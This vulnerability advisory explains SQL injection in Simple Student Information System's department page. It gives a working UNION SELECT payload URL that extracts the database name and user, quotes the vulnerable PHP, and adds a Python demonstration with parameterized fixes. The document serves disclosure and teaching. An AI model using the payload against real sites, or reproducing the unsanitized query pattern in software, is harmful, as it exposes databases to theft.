Vendor Homepage:

https://www.sourcecodester.com

Source Code Download:

Simple Student Information System

Payload

Simple Student Information System SQL Injection

http://192.168.1.8/sis/admin/departments/manage_department.php?id=-5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20-

Source code analysis

admin/departments/manage_department.php, lines 1-13:

As the code shows, the id parameter is read from the GET request and concatenated directly into the SQL statement without any filtering, type casting or parameterization, which results in a SQL injection vulnerability.

The payload above relies on this: the negative id (-5756) closes the single quote and makes the original SELECT match no row, UNION ALL SELECT appends one attacker-chosen row with the same number of columns as department_list (seven, which is why five NULL placeholders are needed), database() and user() land in the second and third columns, and the trailing "-- -" comments out the closing quote of the original query. Because the script copies every column of the fetched row into PHP variables ($$k = $v), the injected values end up in whatever the page renders for that department.

<?php
require_once('../../config.php');
if(isset($_GET['id'])){
    // VULNERABLE: $_GET['id'] is interpolated into the query string as-is.
    // A value such as  -5756' UNION ALL SELECT ...-- -  is executed as SQL.
    $qry = $conn->query("SELECT * FROM `department_list` where id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        $res = $qry->fetch_array();
        // Every named column of the (possibly attacker-controlled) row becomes a PHP variable.
        foreach($res as $k => $v){
            if(!is_numeric($k))
            $$k = $v;
        }
    }
}
?>
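The following is an added example, not code from the advisory or from the Simple Student Information System project. It reproduces the manage_department.php query pattern against an in-memory SQLite table, runs a payload of the same shape as the one above, and then shows the parameterized query that closes the hole. SQLite has no database() or user(), so the payload selects sqlite_version() and a literal instead; the table's column names are constructed, only the column count (seven, inferred from the payload) comes from the advisory.

```python
"""Added example (not part of the advisory or the SIS project).

Reproduces the manage_department.php injection against SQLite and shows
the parameterized fix.  database()/user() are MySQL-only, so the payload
below uses sqlite_version() and a literal instead (assumption).
"""
import sqlite3

# Constructed sample schema.  The advisory's payload pads UNION ALL SELECT to
# seven columns, so department_list has seven columns; the names are assumed.
SCHEMA = """
CREATE TABLE department_list (
    id INTEGER PRIMARY KEY, name TEXT, description TEXT, status INTEGER,
    delete_flag INTEGER, date_created TEXT, date_updated TEXT
);
INSERT INTO department_list VALUES
    (1, 'Computer Science', 'CS dept', 1, 0, '2022-08-01', '2022-08-01'),
    (2, 'Mathematics', 'Math dept', 1, 0, '2022-08-01', '2022-08-01');
"""

# Same shape as the advisory's payload: a non-existent negative id closes the
# quote and empties the original SELECT, UNION ALL appends one attacker-chosen
# row with a matching column count, and "-- -" comments out the trailing quote.
PAYLOAD = ("-5756' UNION ALL SELECT NULL,sqlite_version(),'attacker',"
           "NULL,NULL,NULL,NULL-- -")


def connect():
    """Fresh in-memory database with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, user_id):
    """Mirrors  $conn->query("... where id = '{$_GET['id']}'")."""
    # The raw request value is spliced into the SQL text, so it is parsed as SQL.
    sql = f"SELECT * FROM `department_list` where id = '{user_id}'"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, user_id):
    """Hardened form: placeholder plus bound parameter."""
    # The driver sends the value separately from the statement; it can never
    # change the query's structure, whatever characters it contains.
    sql = "SELECT * FROM `department_list` where id = ?"
    return conn.execute(sql, (user_id,)).fetchone()


def safe_lookup_int(conn, user_id):
    """Belt and braces for a numeric key: reject anything that is not an int."""
    try:
        ident = int(user_id)
    except (TypeError, ValueError):
        return None
    return safe_lookup(conn, ident)


if __name__ == "__main__":
    db = connect()
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD))   # attacker row comes back
    print("parameterized:", safe_lookup(db, PAYLOAD))      # None: no such id
    print("int-cast:", safe_lookup_int(db, PAYLOAD))       # None: rejected
    print("legit:", safe_lookup(db, "1"))                  # the real department row
```

Run it as-is: the vulnerable query returns the injected row (NULL in the id column, the SQLite version and the literal 'attacker' where the real payload places database() and user()), while both hardened lookups return nothing for the same input and still find a real department for a legitimate id. In the PHP original the equivalent fix is a mysqli prepared statement (prepare/bind_param/execute) or, since id is numeric, an intval() cast before the value reaches the query.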